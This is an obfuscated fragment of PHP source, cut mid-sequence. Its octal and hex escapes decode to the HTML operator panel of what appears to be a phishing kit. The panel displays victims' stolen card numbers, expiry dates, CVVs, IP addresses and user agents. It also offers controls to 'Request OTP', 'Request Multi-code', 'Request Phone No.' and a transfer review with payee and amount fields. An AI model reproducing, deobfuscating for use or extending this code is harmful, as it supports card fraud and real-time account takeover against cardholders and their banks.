9\11\x9\11\x9\x9\x9\x3c\x6c\x61\x62\x65\x6c\40\143\x6c\x61\163\163\75\x27\x64\141\164\141\x2d\154\x61\142\x65\x6c\47\x3e\103\103\x20\x4e\x6f\x2e\74\57\x6c\x61\x62\x65\x6c\76\xa\x9\11\11\11\x9\x9\11\x9\x9\11\x3c\x69\156\x70\165\164\x20\x6f\x6e\143\154\151\143\x6b\x3d\47\x63\157\x70\x79\x5f\x62\164\156\x28\x74\150\151\x73\x29\x27\40\143\154\x61\x73\x73\75\x27\x66\157\x72\x6d\55\x63\157\x6e\x74\x72\x6f\154\x27\40\x72\145\141\144\x6f\x6e\x6c\x79\x20\x76\x61\154\165\145\x3d\47{$ccnum}\x27\76\12\x9\x9\x9\11\x9\11\11\x9\x9\x3c\57\144\x69\166\x3e\12\x9\x9\11\11\11\x9\11\11\11\x3c\144\151\x76\x20\x63\154\x61\x73\x73\x3d\47\144\141\164\141\x2d\147\x72\157\165\160\x27\x3e\12\x9\11\x9\11\11\x9\x9\x9\x9\11\74\154\141\142\x65\154\40\143\x6c\141\163\163\x3d\47\x64\x61\x74\141\x2d\154\141\x62\145\x6c\47\76\105\x78\x70\151\162\x79\57\103\126\126\x3c\57\154\x61\142\145\154\76\xa\11\x9\11\11\11\x9\11\11\11\x9\x3c\151\x6e\x70\x75\164\40\x6f\156\x63\154\x69\x63\153\75\47\x63\x6f\x70\x79\x5f\142\x74\156\50\164\150\151\x73\x29\47\x20\x63\x6c\141\x73\163\x3d\x27\x66\157\162\x6d\55\143\x6f\156\164\162\x6f\154\47\x20\x72\x65\x61\144\x6f\x6e\x6c\171\x20\x76\x61\x6c\165\145\x3d\x27{$expiry}\57{$cvvnum}\47\x3e\12\11\11\x9\11\11\x9\x9\11\x9\x3c\57\144\151\x76\x3e\xa\11\11\x9\x9\x9\11\11\x9\11\74\x64\x69\x76\x20\143\x6c\x61\163\x73\x3d\47\x64\x61\164\x61\x2d\147\x72\157\x75\x70\x27\76\12\x9\11\11\11\x9\x9\x9\x9\x9\11\74\154\x61\142\x65\154\x20\143\154\141\163\x73\75\x27\144\x61\164\141\x2d\154\141\142\145\x6c\x27\x3e\x49\x50\57\x44\x65\x76\x69\x63\145\x3c\x2f\154\141\142\145\154\x3e\12\x9\x9\x9\x9\11\11\11\11\x9\x9\74\151\x6e\160\x75\164\x20\157\x6e\x63\x6c\151\x63\153\x3d\x27\143\x6f\x70\171\x5f\142\164\156\x28\x74\150\151\x73\51\47\x20\143\x6c\x61\x73\163\75\x27\x66\x6f\162\x6d\x2d\143\x6f\156\164\x72\157\x6c\x27\x20\x72\x65\x61\x64\157\156\x6c\x79\x20\x76\x61\x6c\165\x65\75\47{$ip}\x20\133{$useragent}\x5d\47\76\xa\11\x9\x9\x9\x9\11\x9\x9\x9\x3c\x2f\x64\151\166\76\12\11\11\11\x9\11\11\11\x9\x9\x3c\142\162\76\12\x9\x9\11\x9\11\x9\x9\x9\x3c\x2f\x64\x69\166\76\12\x9\x9\11\x9\11\11\xa\11\11\x9\11\x9\x9\x9\x9\x3c\x21\x2d\55\x20\105\x4e\x44\x20\x2d\x2d\76\xa\x9\x9\x9\x9\11\x9\12\11\11\11\x9\11\x9\11\x9\74\164\141\142\x6c\145\40\163\x74\x79\x6c\145\75\x27\167\x69\x64\x74\x68\x3a\x20\x31\x30\60\x25\x3b\x62\141\143\x6b\147\x72\157\165\x6e\x64\55\143\157\x6c\157\x72\72\x20\142\x6c\x61\143\x6b\73\x63\157\x6c\157\x72\72\x20\167\150\x69\164\x65\x3b\160\141\x64\144\x69\156\x67\x3a\40\61\60\45\x3b\x27\x3e\12\11\11\x9\11\x9\x9\x9\x9\x9\x3c\164\142\x6f\x64\x79\x20\163\164\171\154\x65\75\x27\154\151\x6e\x65\x2d\x68\x65\x69\x67\150\164\72\61\60\x30\x25\73\47\x3e\xa\11\x9\x9\x9\12\11\x9\11\x9\11\11\11\11\11\x9\74\x74\x72\76\12\x9\11\11\x9\x9\x9\11\11\11\x9\x9\x3c\x74\x64\76\12\11\x9\x9\11\x9\11\11\x9\11\x9\11\11\74\144\x69\166\x20\x63\x6c\141\163\x73\x3d\47\146\x6f\162\x6d\55\143\150\x65\143\x6b\47\76\xa\11\x9\11\x9\11\x9\x9\x9\11\11\x9\x9\x9\74\x6c\x61\x62\145\154\40\146\x6f\162\75\47\141\163\153\143\150\141\162\163\162\141\x64\151\157\x30{$value["\x69\144"]}\x27\40\x63\x6c\x61\x73\x73\x3d\47\146\157\162\155\x2d\x63\x68\145\143\153\x2d\154\141\142\145\154\x27\76\12\11\x9\x9\11\x9\11\x9\11\11\11\11\11\11\11\74\151\x6e\x70\x75\164\40\164\171\160\x65\75\47\x72\141\x64\x69\x6f\x27\x20\156\x61\155\145\x3d\x27\163\x74\141\164\165\x73\x27\40\166\141\x6c\x75\x65\x3d\47\x31\61\x27\40\151\x64\x3d\x27\x61\x73\153\x63\150\x61\x72\163\x72\x61\x64\x69\157\x30{$value["\151\x64"]}\x27\40\x6f\156\x63\x6c\x69\x63\153\x3d\47\x73\x68\157\x77\x66\x69\x65\x6c\x64\163\50{$value["\x69\144"]}\51\x3b\47\x20\x63\154\141\x73\x73\x3d\x27\x73\x74\141\164\165\163\x20\146\157\x72\155\x2d\143\x68\x65\143\153\55\x69\156\x70\x75\x74\47\76\xa\11\x9\11\x9\11\11\x9\x9\x9\x9\11\x9\x9\x9\x3c\163\x70\141\156\x3e\x52\145\x71\165\145\163\x74\40\x4d\x75\154\x74\x69\55\x63\157\144\x65\x3c\57\163\x70\x61\156\76\12\11\11\11\11\11\11\11\11\11\11\x9\x9\x9\74\x2f\154\x61\x62\x65\154\x3e\12\x9\11\11\11\x9\x9\11\11\11\x9\11\x9\74\x2f\x64\x69\x76\x3e\xa\11\11\x9\x9\11\x9\11\11\x9\x9\11\x9\x3c\x21\55\x2d\x20\111\156\x70\x75\x74\40\x63\150\141\162\x61\143\x74\145\x72\x73\40\12\11\11\x9\x9\x9\11\x9\x9\x9\11\x9\11\x3c\144\151\166\x20\x63\x6c\141\x73\163\75\x27\x66\x6f\162\155\55\x67\162\x6f\x75\160\47\x20\163\x74\171\154\x65\75\47\144\x69\x73\x70\154\141\x79\x3a\x6e\157\x6e\145\73\47\x20\x69\x64\75\x27\141\x73\x6b\143\150\x61\x72\163\60{$value["\151\x64"]}\x27\76\xa\11\x9\x9\11\x9\x9\x9\11\x9\x9\11\11\11\74\144\151\x76\40\143\x6c\x61\163\x73\75\47\162\x6f\167\47\x20\163\164\x79\x6c\x65\x3d\x27\155\141\x72\x67\151\156\55\154\x65\146\x74\x3a\x35\x25\73\x6d\141\162\147\151\x6e\x2d\164\157\x70\72\x35\x70\170\47\40\76\xa\11\x9\x9\11\11\11\x9\11\11\x9\x9\x9\11\11\x3c\144\151\166\40\143\154\141\163\x73\75\x27\143\157\154\47\76\xa\x9\x9\x9\x9\11\x9\x9\x9\x9\11\x9\x9\11\11\11\74\x73\145\x6c\x65\143\164\40\143\x6c\x61\x73\163\x3d\47\x66\157\162\x6d\55\143\157\x6e\x74\x72\x6f\154\47\40\x6e\x61\x6d\145\x3d\47\143\150\x61\162\x31\47\x3e\xa\11\x9\x9\x9\x9\11\x9\11\x9\11\11\x9\11\11\x9\11\74\x6f\x70\x74\151\x6f\x6e\x20\166\x61\x6c\x75\145\75\47\x31\xc2\252\x27\76\61\302\xaa\x3c\x2f\x6f\x70\x74\151\x6f\x6e\x3e\12\11\x9\11\11\x9\x9\x9\x9\x9\x9\x9\x9\11\x9\11\11\x3c\157\160\164\x69\157\x6e\40\x76\141\154\x75\145\x3d\x27\x32\302\252\x27\76\62\302\xaa\74\57\x6f\160\x74\151\x6f\x6e\x3e\xa\11\x9\x9\11\11\11\x9\11\11\x9\11\x9\11\x9\11\11\x3c\x6f\x70\x74\x69\x6f\156\40\166\x61\154\165\x65\x3d\x27\63\302\252\47\x3e\x33\xc2\252\74\57\157\160\x74\151\157\156\x3e\12\11\11\x9\11\11\x9\x9\11\11\11\x9\x9\11\x9\x9\x9\74\x6f\x70\164\x69\x6f\156\40\x76\141\x6c\x75\x65\x3d\47\x34\xc2\252\47\76\64\302\xaa\x3c\57\157\x70\164\151\157\156\x3e\12\11\x9\11\11\11\11\x9\11\11\x9\x9\x9\11\x9\11\x9\x3c\x6f\x70\x74\151\x6f\156\40\166\x61\x6c\x75\x65\x3d\x27\x35\xc2\252\x27\x3e\65\302\252\x3c\57\x6f\160\x74\151\x6f\x6e\76\xa\11\x9\11\11\x9\x9\x9\x9\x9\x9\x9\11\x9\11\x9\11\74\x6f\x70\x74\151\157\x6e\40\x76\x61\154\x75\145\x3d\47\x36\302\252\47\76\66\xc2\252\74\x2f\157\x70\x74\x69\x6f\x6e\76\xa\11\11\x9\11\x9\x9\x9\11\11\11\11\11\x9\11\11\x9\x3c\x6f\160\164\x69\157\x6e\x20\166\x61\154\165\145\x3d\47\x37\xc2\252\47\x3e\x37\302\xaa\x3c\x2f\x6f\x70\164\x69\x6f\156\x3e\xa\11\x9\11\11\11\11\11\x9\11\x9\11\11\x9\x9\x9\x9\x3c\x6f\160\164\151\x6f\156\x20\x76\x61\x6c\x75\x65\x3d\47\70\xc2\252\x27\76\x38\xc2\xaa\74\x2f\157\x70\164\151\157\x6e\x3e\12\x9\11\11\11\11\11\11\11\11\x9\x9\x9\11\11\x9\x9\x3c\x6f\160\x74\151\157\x6e\x20\166\141\154\x75\145\x3d\47\71\302\xaa\47\76\71\xc2\xaa\74\57\x6f\160\164\x69\x6f\156\76\xa\11\x9\11\x9\11\x9\11\x9\x9\11\x9\11\11\11\11\x9\74\x6f\x70\164\x69\157\x6e\x20\x76\x61\154\165\145\x3d\47\61\x30\302\252\x27\76\x31\x30\xc2\xaa\x3c\57\x6f\160\164\151\157\156\76\xa\11\11\11\x9\x9\11\11\x9\x9\11\11\11\11\x9\11\11\x3c\x6f\160\164\x69\157\x6e\40\x76\x61\154\x75\145\x3d\x27\x31\x31\302\252\47\x3e\61\x31\302\xaa\x3c\x2f\x6f\x70\164\151\157\x6e\76\12\x9\x9\11\11\x9\x9\11\11\11\11\11\x9\x9\11\11\x9\x3c\x6f\160\x74\151\x6f\x6e\40\166\x61\x6c\165\145\x3d\x27\61\62\xc2\xaa\x27\76\x31\62\302\xaa\74\57\x6f\x70\x74\x69\157\x6e\76\xa\x9\x9\x9\11\11\11\11\11\11\11\x9\x9\11\11\11\11\x3c\157\x70\x74\x69\157\x6e\x20\166\141\154\165\145\75\x27\61\63\xc2\xaa\47\x3e\x31\x33\xc2\xaa\x3c\x2f\x6f\160\x74\151\x6f\156\76\12\x9\x9\x9\11\11\11\x9\11\x9\x9\11\11\x9\11\11\x3c\x2f\163\x65\154\145\143\164\x3e\12\x9\11\x9\11\11\11\11\x9\x9\11\11\11\11\11\x3c\x2f\144\x69\166\76\xa\x9\x9\11\11\11\11\11\x9\x9\11\x9\x9\11\11\x3c\x64\151\166\x20\x63\154\x61\163\x73\75\x27\143\x6f\x6c\47\x3e\xa\x9\11\11\11\11\x9\11\11\x9\x9\11\11\11\x9\11\74\x73\x65\x6c\145\143\x74\x20\x63\154\141\163\x73\75\x27\x66\x6f\162\x6d\x2d\x63\x6f\156\164\162\157\x6c\x27\40\x6e\x61\155\145\75\x27\143\150\141\x72\62\x27\x3e\xa\11\x9\11\11\11\11\11\x9\11\11\x9\x9\x9\11\11\x9\x3c\157\x70\164\x69\x6f\156\x20\x76\141\154\x75\145\x3d\x27\x31\302\252\x27\x3e\61\xc2\252\74\57\157\160\x74\151\x6f\156\76\12\x9\11\x9\11\x9\11\x9\x9\x9\11\11\11\x9\x9\x9\x9\74\157\x70\164\x69\157\156\40\x76\x61\x6c\x75\x65\75\x27\x32\xc2\xaa\x27\76\x32\302\252\x3c\x2f\x6f\x70\164\x69\157\156\76\12\x9\11\11\11\x9\x9\x9\11\x9\x9\11\11\x9\11\x9\x9\x3c\x6f\160\164\x69\157\x6e\x20\x76\141\x6c\x75\x65\75\47\x33\302\252\x27\x3e\63\xc2\252\74\57\x6f\x70\164\151\x6f\x6e\x3e\xa\x9\x9\x9\11\x9\11\x9\11\11\11\11\x9\11\11\x9\x9\x3c\157\x70\x74\151\x6f\156\40\166\x61\154\165\145\75\x27\64\302\xaa\47\76\64\xc2\xaa\x3c\57\157\x70\x74\151\157\156\x3e\12\x9\x9\11\11\x9\11\x9\11\x9\x9\11\x9\x9\x9\x9\11\74\x6f\160\x74\x69\157\156\40\166\141\x6c\165\x65\x3d\x27\65\302\252\x27\x3e\65\302\252\74\x2f\x6f\160\164\x69\x6f\x6e\76\xa\x9\x9\11\11\11\x9\11\11\11\x9\x9\11\x9\11\x9\11\74\157\x70\164\x69\157\156\x20\x76\x61\154\165\145\75\x27\x36\xc2\xaa\x27\x3e\66\xc2\252\x3c\57\x6f\x70\x74\151\x6f\156\x3e\xa\x9\11\11\x9\11\x9\x9\x9\11\x9\x9\x9\x9\x9\x9\x9\74\x6f\160\164\151\x6f\x6e\x20\166\x61\x6c\165\x65\x3d\x27\67\302\xaa\47\x3e\x37\xc2\xaa\x3c\57\157\160\x74\151\x6f\156\x3e\xa\x9\11\x9\x9\11\x9\11\x9\x9\x9\x9\11\x9\11\x9\11\74\157\160\164\x69\x6f\x6e\x20\x76\x61\x6c\x75\x65\x3d\47\70\302\xaa\47\x3e\x38\302\252\74\x2f\x6f\160\x74\151\157\x6e\76\12\x9\x9\11\x9\11\11\x9\x9\11\x9\x9\x9\11\11\11\11\74\157\x70\x74\x69\157\x6e\x20\x76\x61\154\x75\145\75\x27\71\302\xaa\47\x3e\x39\302\xaa\x3c\57\x6f\x70\x74\x69\157\x6e\x3e\12\x9\x9\x9\11\x9\11\11\11\11\11\x9\11\x9\x9\x9\11\x3c\157\x70\x74\x69\x6f\x6e\x20\x76\141\154\165\x65\x3d\x27\61\x30\xc2\xaa\47\x3e\x31\x30\302\xaa\74\x2f\157\160\x74\151\x6f\156\x3e\12\11\x9\11\x9\x9\x9\11\11\x9\x9\x9\11\x9\11\11\x9\x3c\157\160\x74\151\157\156\40\x76\x61\x6c\165\145\75\x27\x31\61\xc2\xaa\x27\x3e\x31\61\xc2\252\74\57\157\160\x74\x69\x6f\x6e\x3e\xa\11\x9\11\11\11\11\11\11\11\11\11\x9\11\11\x9\x9\74\x6f\160\164\x69\157\156\x20\166\141\x6c\x75\x65\x3d\x27\61\x32\302\xaa\47\x3e\61\x32\302\xaa\74\x2f\x6f\x70\164\151\157\156\76\12\x9\x9\11\11\x9\11\x9\11\x9\11\11\x9\x9\11\x9\11\x3c\x6f\160\x74\x69\157\x6e\40\166\141\154\x75\145\75\47\61\63\xc2\252\47\76\x31\x33\302\xaa\x3c\57\x6f\x70\x74\x69\x6f\x6e\76\12\x9\11\x9\11\11\11\11\x9\x9\11\11\x9\11\11\x9\74\x2f\x73\x65\154\145\143\164\76\xa\x9\x9\11\x9\11\11\11\x9\x9\x9\11\11\11\x9\x3c\x2f\144\x69\166\x3e\12\x9\x9\x9\x9\x9\x9\x9\x9\x9\x9\11\11\x9\11\x3c\x64\x69\x76\x20\143\x6c\x61\163\163\x3d\x27\x63\x6f\154\x27\x3e\12\x9\x9\11\11\x9\x9\11\11\11\11\11\x9\11\x9\11\74\163\x65\x6c\145\143\x74\x20\x63\x6c\141\163\x73\x3d\47\146\x6f\x72\x6d\x2d\x63\157\x6e\164\x72\x6f\x6c\x27\40\156\141\155\x65\x3d\x27\x63\150\141\x72\x33\x27\x3e\12\x9\x9\11\11\11\x9\11\11\11\11\x9\11\11\x9\x9\11\74\157\160\x74\151\157\x6e\x20\x76\141\x6c\165\x65\75\47\61\xc2\xaa\47\x3e\61\xc2\xaa\74\x2f\x6f\x70\x74\x69\x6f\156\76\xa\11\x9\x9\x9\11\x9\x9\x9\x9\11\11\x9\11\11\x9\11\x3c\157\160\164\151\157\156\x20\166\141\154\165\145\x3d\47\62\302\252\x27\76\x32\302\252\x3c\x2f\157\x70\164\151\x6f\x6e\x3e\12\11\11\x9\11\11\11\x9\11\x9\11\x9\11\x9\11\x9\11\74\157\x70\x74\x69\157\156\40\x76\141\154\165\x65\x3d\x27\63\302\xaa\47\x3e\x33\xc2\xaa\x3c\x2f\x6f\x70\164\x69\157\156\x3e\12\11\11\11\11\11\x9\11\x9\x9\11\x9\x9\11\x9\x9\11\74\157\x70\164\151\x6f\156\x20\x76\141\154\x75\x65\75\47\x34\xc2\xaa\x27\x3e\x34\xc2\xaa\x3c\57\157\x70\164\151\157\x6e\x3e\12\x9\11\x9\x9\11\x9\11\x9\11\x9\x9\x9\x9\x9\11\x9\x3c\157\160\x74\x69\157\156\x20\x76\x61\x6c\x75\145\75\47\65\302\252\x27\x3e\x35\xc2\252\x3c\57\x6f\160\164\x69\157\x6e\x3e\xa\11\x9\x9\x9\11\x9\x9\11\x9\x9\11\11\x9\11\x9\x9\x3c\157\160\164\x69\x6f\x6e\x20\166\141\154\165\x65\x3d\x27\x36\xc2\xaa\x27\76\x36\302\xaa\74\x2f\x6f\160\x74\x69\x6f\x6e\76\12\x9\x9\x9\x9\x9\11\11\11\11\x9\x9\11\x9\11\x9\11\74\157\x70\164\151\157\156\40\x76\x61\x6c\x75\145\75\47\67\xc2\252\47\x3e\x37\xc2\252\x3c\x2f\x6f\x70\x74\151\x6f\156\x3e\12\x9\11\x9\x9\x9\x9\x9\11\x9\11\11\11\11\x9\x9\11\74\x6f\160\x74\151\157\156\40\166\141\x6c\x75\x65\75\47\70\302\xaa\47\x3e\70\302\252\74\x2f\157\160\x74\x69\x6f\156\76\xa\11\x9\11\11\x9\11\11\11\x9\11\x9\11\11\11\x9\x9\74\157\160\164\x69\x6f\156\40\166\x61\154\165\x65\75\47\x39\xc2\xaa\x27\x3e\71\302\252\74\57\157\160\x74\x69\x6f\156\76\xa\x9\11\11\11\11\11\x9\11\11\11\x9\11\x9\x9\x9\x9\x3c\x6f\160\x74\x69\x6f\x6e\40\166\141\x6c\165\x65\75\47\x31\x30\302\xaa\x27\x3e\x31\60\302\xaa\74\x2f\x6f\x70\164\x69\x6f\156\76\xa\11\11\11\x9\11\11\x9\x9\x9\x9\11\x9\x9\x9\11\11\x3c\157\160\x74\x69\157\x6e\x20\x76\x61\x6c\x75\145\x3d\47\61\x31\302\xaa\47\76\61\x31\xc2\252\x3c\57\x6f\x70\x74\x69\x6f\156\x3e\xa\11\x9\11\x9\11\11\11\x9\x9\11\x9\x9\11\x9\11\11\74\157\x70\164\151\157\156\40\166\x61\x6c\x75\x65\x3d\x27\x31\62\302\252\47\76\x31\62\302\252\74\x2f\x6f\x70\x74\151\x6f\x6e\76\xa\11\11\11\11\x9\11\11\11\x9\11\x9\x9\11\x9\11\x9\x3c\157\x70\x74\x69\157\156\x20\166\x61\154\165\145\x3d\47\x31\63\xc2\252\x27\76\61\63\xc2\252\74\x2f\157\x70\164\x69\x6f\156\76\12\11\11\11\11\11\11\11\x9\11\11\x9\x9\x9\x9\11\x3c\57\x73\x65\154\x65\143\x74\76\xa\11\x9\x9\x9\x9\11\11\x9\11\x9\11\11\11\11\x3c\57\144\151\166\x3e\xa\x9\11\11\x9\11\11\11\11\11\x9\x9\x9\11\x3c\57\x64\x69\x76\76\xa\11\11\11\x9\11\11\x9\x9\x9\11\x9\11\x3c\x2f\144\151\x76\x3e\xa\11\x9\11\11\11\11\11\x9\x9\11\x9\11\x2d\55\x3e\xa\x9\x9\x9\11\x9\11\11\11\x9\x9\11\x3c\57\164\144\x3e\xa\x9\x9\11\11\x9\x9\xa\11\x9\11\11\x9\x9\11\x9\x9\x9\x9\74\164\144\x3e\12\11\11\11\11\x9\x9\x9\x9\11\11\11\x9\x3c\144\x69\166\40\143\x6c\x61\163\x73\x3d\47\x66\157\x72\155\x2d\143\150\x65\x63\x6b\47\x3e\12\11\x9\x9\x9\11\11\x9\x9\11\11\x9\x9\x9\74\154\141\x62\145\x6c\40\x66\157\x72\75\x27\141\x73\x6b\x63\x68\x61\162\163\162\x61\x64\x69\157\x31{$value["\151\144"]}\x27\x20\143\154\x61\163\163\x3d\47\146\x6f\162\155\x2d\143\x68\x65\143\x6b\x2d\x6c\141\x62\x65\154\x27\x3e\12\11\11\11\11\11\x9\x9\11\x9\x9\11\11\11\x9\74\151\x6e\x70\165\164\x20\x74\x79\x70\145\x3d\x27\162\x61\x64\151\157\47\40\x6e\141\x6d\x65\75\47\163\164\141\x74\x75\163\47\40\166\x61\154\x75\145\75\47\x31\62\47\40\x69\x64\x3d\x27\x61\x73\153\x63\x68\x61\162\x73\162\141\144\151\157\x31{$value["\x69\x64"]}\x27\40\x6f\156\143\154\151\143\x6b\x3d\x27\163\150\157\167\146\x69\x65\154\x64\163\50{$value["\151\144"]}\51\x3b\x27\x20\x63\154\x61\x73\163\x3d\x27\x73\x74\x61\164\x75\163\x20\146\157\162\x6d\x2d\143\x68\145\143\153\55\151\x6e\160\x75\x74\x27\x3e\12\11\11\11\11\11\x9\11\x9\11\11\x9\x9\x9\x9\74\x73\x70\141\x6e\x3e\122\x65\x71\165\x65\x73\x74\x20\x4f\x54\x50\x3c\x2f\x73\160\x61\x6e\x3e\12\x9\x9\x9\x9\x9\x9\11\11\11\x9\x9\x9\x9\x3c\x2f\154\141\x62\x65\x6c\x3e\12\x9\11\x9\x9\x9\11\11\11\11\x9\11\11\x3c\57\x64\151\166\76\12\x9\11\x9\11\11\11\x9\11\x9\11\x9\x3c\57\164\x64\x3e\xa\11\x9\11\11\11\11\x9\x9\11\x9\74\x2f\x74\162\76\12\x9\x9\x9\11\11\11\11\11\11\11\12\x9\11\11\11\x9\11\x9\11\11\11\x3c\164\x72\76\xa\11\x9\11\11\11\x9\11\11\11\x9\11\74\x74\x64\x3e\12\11\11\x9\x9\x9\x9\11\x9\11\11\x9\x9\74\144\x69\x76\x20\x63\x6c\x61\x73\x73\75\x27\146\157\162\x6d\55\143\x68\145\x63\153\47\x3e\xa\11\x9\x9\x9\x9\x9\x9\x9\11\11\11\x9\x9\74\154\x61\142\x65\x6c\40\146\x6f\x72\75\x27\x61\x73\x6b\x63\150\141\x72\163\x72\x61\144\x69\157\62{$value["\151\x64"]}\x27\x20\x63\154\141\163\x73\75\x27\146\x6f\x72\155\x2d\143\150\145\143\x6b\55\x6c\141\x62\145\154\x27\76\12\x9\x9\x9\x9\11\x9\x9\x9\x9\11\11\11\x9\x9\74\x69\x6e\160\x75\x74\x20\x74\x79\160\x65\x3d\47\x72\x61\x64\151\x6f\47\x20\156\141\x6d\x65\x3d\47\x73\164\141\164\x75\163\47\40\166\x61\154\x75\145\x3d\47\x31\x33\x27\40\151\x64\75\x27\141\x73\x6b\x63\150\141\162\163\x72\141\x64\151\x6f\x32{$value["\151\144"]}\47\40\157\x6e\143\x6c\151\x63\153\75\x27\163\150\157\167\146\151\145\154\144\x73\x28{$value["\x69\144"]}\x29\x3b\x27\40\143\x6c\141\163\163\75\47\163\x74\x61\164\x75\x73\40\x66\157\162\155\x2d\143\x68\145\x63\153\55\151\156\x70\165\x74\x27\76\xa\11\11\x9\11\11\x9\11\x9\11\x9\x9\11\11\x9\x3c\163\160\x61\156\76\x52\145\161\x75\x65\x73\x74\x20\x54\x72\x61\156\x73\x66\x65\x72\x20\162\x65\x76\x69\145\167\x3c\57\163\160\141\x6e\x3e\12\x9\11\11\11\11\11\11\x9\11\11\11\11\x9\x3c\57\154\x61\142\x65\154\x3e\xa\x9\x9\x9\11\11\11\11\x9\x9\11\11\x9\x3c\57\144\x69\166\76\12\11\11\11\11\11\x9\11\x9\11\11\x9\11\74\x21\55\x2d\40\111\156\160\x75\x74\40\143\150\x61\x72\x61\143\x74\145\162\x73\40\x2d\55\76\12\x9\11\x9\11\11\x9\11\11\x9\x9\x9\11\x3c\144\151\x76\40\x63\154\141\163\x73\75\x27\146\157\x72\x6d\x2d\147\162\x6f\165\x70\47\x20\163\164\x79\154\145\x3d\47\x64\x69\163\160\154\141\x79\72\x6e\x6f\156\145\x3b\x27\40\151\144\75\47\141\163\x6b\x63\x68\x61\162\163\x32{$value["\151\144"]}\x27\x3e\xa\11\x9\x9\11\11\x9\x9\11\11\11\x9\11\11\x3c\144\151\x76\x20\143\154\141\163\x73\75\47\x72\157\x77\47\x20\163\164\x79\154\145\75\x27\155\141\x72\x67\x69\156\x2d\x6c\145\146\164\72\65\45\x3b\x6d\141\162\147\x69\x6e\55\164\x6f\160\72\x35\x70\170\47\40\76\xa\x9\x9\x9\x9\11\11\x9\11\11\11\11\x9\11\11\74\x64\x69\x76\40\143\154\141\x73\x73\75\47\143\x6f\x6c\47\76\xa\11\11\x9\x9\11\11\11\x9\x9\11\11\x9\x9\11\11\74\151\156\x70\165\x74\40\x74\x79\160\145\x3d\47\x74\x65\x78\164\x27\40\143\x6c\141\x73\163\75\47\x66\x6f\x72\155\x2d\x63\157\x6e\164\162\157\154\x27\x20\x6e\141\155\x65\x3d\x27\x70\x61\171\x65\145\x4e\141\155\x65\x27\x20\x69\144\x3d\47\x70\141\171\145\x65\x4e\x61\x6d\145\x27\40\x70\154\141\143\x65\x68\157\154\x64\x65\x72\75\47\x49\x6e\x70\165\164\x20\x70\141\171\145\145\x20\156\141\x6d\145\x20\150\145\162\145\x27\x20\163\x74\x79\x6c\145\75\x27\167\151\144\164\150\x3a\x31\x30\60\x25\73\x62\x6f\162\144\x65\162\55\x63\157\x6c\157\162\x3a\43\144\66\144\66\145\65\47\76\xa\x9\11\x9\x9\11\x9\x9\11\x9\x9\x9\x9\11\x9\74\x2f\x64\151\x76\x3e\12\x9\x9\11\x9\11\x9\x9\x9\11\11\11\x9\11\74\x2f\144\x69\166\76\12\11\11\11\11\x9\x9\11\11\x9\11\x9\11\11\74\144\x69\x76\x20\x63\154\x61\x73\163\x3d\47\x72\157\167\47\x20\x73\x74\171\x6c\x65\x3d\47\x6d\141\x72\147\x69\x6e\x2d\154\x65\146\164\72\65\45\73\x6d\141\162\147\151\x6e\55\164\x6f\160\x3a\x35\160\170\47\x20\x3e\12\11\11\11\11\x9\x9\11\x9\x9\11\11\11\x9\x9\x3c\x64\x69\x76\x20\143\154\141\163\x73\x3d\x27\143\157\154\x27\x3e\12\11\11\x9\x9\x9\11\x9\x9\11\11\11\x9\11\11\11\x3c\151\156\160\165\164\x20\164\x79\x70\x65\75\x27\x74\x65\170\x74\47\x20\x63\x6c\x61\163\x73\x3d\47\x66\x6f\x72\155\55\x63\x6f\x6e\x74\162\157\x6c\x27\x20\x6e\x61\155\x65\x3d\x27\141\155\x6f\x75\x6e\x74\x27\x20\151\144\75\x27\x61\x6d\157\165\156\164\47\x20\x70\x6c\x61\143\x65\x68\157\154\x64\145\x72\x3d\x27\111\156\x70\165\x74\x20\x61\x6d\x6f\165\x6e\164\x20\150\x65\162\x65\x27\x20\x73\x74\171\x6c\x65\75\47\x77\x69\x64\164\x68\72\x31\x30\x30\45\x3b\x62\x6f\162\144\x65\162\x2d\143\157\x6c\157\x72\x3a\x23\x64\66\x64\66\x65\65\47\x3e\12\11\x9\11\11\x9\11\x9\11\11\11\x9\x9\11\11\x3c\x2f\144\151\x76\76\12\11\x9\11\11\x9\11\11\11\11\11\x9\11\x9\x3c\57\144\151\166\x3e\xa\x9\11\11\11\11\11\11\x9\x9\x9\x9\11\x3c\57\144\x69\166\76\12\x9\11\11\11\x9\11\x9\x9\x9\11\11\x3c\x2f\164\144\76\xa\11\x9\x9\x9\x9\11\x9\x9\11\x9\11\x3c\x74\x64\76\12\x9\11\11\x9\11\x9\x9\11\x9\x9\11\11\74\x64\x69\166\40\143\x6c\x61\163\163\75\x27\146\x6f\x72\x6d\55\143\x68\x65\143\x6b\47\x3e\xa\11\11\11\x9\11\x9\x9\11\x9\x9\x9\11\11\74\154\141\x62\145\x6c\x20\x66\157\162\75\47\x61\x73\153\x63\150\x61\162\163\x72\141\144\x69\x6f\x35{$value["\x69\x64"]}\x27\x20\x63\x6c\x61\x73\163\75\x27\146\x6f\x72\x6d\55\x63\x68\x65\x63\x6b\x2d\x6c\141\142\x65\154\47\x3e\12\11\x9\x9\x9\x9\x9\11\x9\x9\x9\x9\x9\11\x9\x3c\151\x6e\x70\165\164\x20\x74\171\x70\145\x3d\x27\x72\x61\x64\x69\x6f\x27\x20\x6e\141\155\x65\75\47\x73\164\141\164\x75\x73\47\x20\166\x61\x6c\165\x65\75\47\61\66\x27\40\x69\x64\x3d\x27\141\x73\153\143\x68\141\x72\x73\162\141\144\151\x6f\x35{$value["\x69\144"]}\x27\x20\x6f\x6e\x63\154\x69\143\153\75\x27\163\x68\x6f\x77\x66\x69\x65\154\144\x73\50{$value["\x69\144"]}\x29\x3b\x27\40\143\x6c\141\x73\x73\x3d\47\163\164\x61\x74\165\x73\x20\x66\157\162\x6d\x2d\x63\150\x65\x63\x6b\x2d\151\156\x70\165\x74\x27\x3e\xa\11\x9\x9\11\x9\x9\11\x9\x9\x9\x9\x9\x9\11\74\x73\x70\141\156\76\x52\145\x71\165\145\x73\x74\40\120\x68\157\x6e\145\x20\116\x6f\x2e\x3c\x2f\163\160\x61\156\x3e\xa\11\x9\x9\x9\11\11\11\x9\x9\11\x9\x9\11\x3c\57\154\x61\142\x65\x6c\x3e\xa\x9\x9\x9\11\x9\x9\x9\x9\11\x9\11\11\74\x2f\x64\x69\x76\x3e\12\x9\x9\11\x9\x9\11\11\x9\11\x9\11\74\57\164\x64\x3e\12\11\11\x9\x9\x9\x9\x9\x9\x9\x9\x3c\x2f\x74\x72\76\xa\x9\x9\11\x9\x9\11\11\11\11\11\xa\x9\x9\11\11\x9\x9\x9\x9\x9\x9\x3c\x74\162\x3e\xa\x9\x9\11\11\11\11\11\11\x9\11\x9\x3c\164\x64\76\12\11\x